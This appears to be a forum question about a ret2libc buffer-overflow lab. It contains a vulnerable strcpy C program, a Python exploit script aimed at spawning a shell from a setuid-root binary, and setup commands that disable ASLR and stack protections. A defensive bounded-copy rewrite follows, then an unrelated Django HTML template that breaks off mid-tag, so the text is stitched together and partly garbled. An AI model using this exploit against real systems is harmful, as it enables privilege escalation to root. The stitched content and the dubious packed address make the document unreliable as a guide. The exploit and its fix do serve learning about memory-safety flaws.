I have to use an exploit Python script to open a shell in a C program. I am using an Ubuntu VM to do this.
C program:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buf[256];
strcpy(buf, argv[1]);
printf("%s\n", buf);
return 0;
}
So far I have created exploit.py:
#!/usr/bin/env python
import struct
padding = "A"*(10)+"B"*(10)+"C"*(10)+"D"*(10)+"E"*(10)+"F"*(10)+"G"*(10)+"H"*(10)+"I"*(10)+"J"*(10)+"K"*(10)+"L"*(10)+"M"*(10)+"N"*(10)+"O"*(10)+"P"*(10)+"Q"*(10)+"R"*(10)+"S"*(10)+"T"*(10)+"U"*(10)+"V"*(10) +"W"*(10)+"X"*(10)+"Y"*(10)+"Z"*(7)
system = struct.pack("I", 0x0000060d)
return_after_system = "AAAA"
bin_sh = struct.pack("I",0xf7f61e8b)
print padding + system + return_after_system + bin_sh
I found the /bin/sh address, verified that it is the correct address, and then packed the struct.
Before compiling and running the code, I run the following commands
sudo sysctl -w kernel.randomize_va_space=0
gcc -m32 -g -fno-stack-protector -o vulnerable -z execstack vulnerable.c
sudo chown root:root vulnerable
sudo chmod u+s vulnerable
Then I run the program like this
./vulnerable `python exploit.py`
But it only outputs the following, with no shell
OUTPUT: …
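The program in the question overflows because strcpy copies argv[1] into a 256-byte stack buffer without checking its length (and dereferences argv[1] even when no argument is given). The following is an added example, not code from the question or its author, showing the bounded counterpart of that program: a copy_arg_bounded helper (a name chosen here) refuses any input that would not fit, and two constructed inputs exercise the fits/does-not-fit paths. It is meant to be built with the compiler's default protections left on, rather than with the -fno-stack-protector and -z execstack flags used above.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256

/*
 * Copy src into dst only if src (including its terminating NUL) fits in
 * dst_size bytes. Returns 1 on success and 0 if the input is too long,
 * in which case dst is left untouched. memchr is used instead of strlen
 * so that an over-long, unterminated source is never scanned past dst_size.
 */
int copy_arg_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return 0;
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)
        return 0;                       /* no NUL within dst_size: would overflow */
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 1;
}

/* Constructed input that fits comfortably in the buffer. */
int demo_fits(void)
{
    char buf[BUF_SIZE];
    return copy_arg_bounded(buf, sizeof buf, "hello");
}

/* Constructed input of 299 'A's plus NUL, longer than the buffer:
 * the same shape as the padding the question's script builds. */
int demo_too_long(void)
{
    char big[300];
    char buf[BUF_SIZE];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return copy_arg_bounded(buf, sizeof buf, big);
}

/* Exactly 255 characters plus NUL is the largest input that fits. */
int demo_exact_fit(void)
{
    char edge[BUF_SIZE];
    char buf[BUF_SIZE];
    memset(edge, 'B', sizeof edge - 1);
    edge[sizeof edge - 1] = '\0';
    return copy_arg_bounded(buf, sizeof buf, edge);
}

int main(int argc, char *argv[])
{
    char buf[BUF_SIZE];

    if (argc < 2) {                     /* the original dereferences argv[1] unchecked */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (!copy_arg_bounded(buf, sizeof buf, argv[1])) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}
```

Running it with the 257-byte string from the question's script prints the "input too long" message and exits instead of returning through an overwritten saved return address; memchr bounds the scan to dst_size, so the check itself cannot read past the end of a source that has no terminator within that range.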
HTML
{% load static %}
<link rel="stylesheet" type="text/css" href="{% static 'lessons/style.css' %}" />
<script>
function openNav() {
document.getElementById("mySidenav").style.width = "20%";
document.getElementById("main").style.marginLeft = "20%";
}
function closeNav() {
document.getElementById("mySidenav").style.width = "0";
document.getElementById("main").style.marginLeft= "20%";
}
</script>
<div id="mySidenav" class="sidenav">
<a href="javascript:void(0)" class="closebtn" onclick="closeNav()">×</a>
<a href="{% url 'home' %}" class="active">Home</a>
<a href="{% url 'lessons:index' %}" class="active">Lessons</a>
<a href="{% url 'resources' %}" class="active">Resources</a>
</div>
<div id="main">
<span style="font-size:30px;cursor:crosshair;display:inline-block" onclick="openNav()">☰</span>
<h1>Exercise</h1>
<form id = "exercise" action= " ">
{% for question in lesson.question_set.all %}
{% …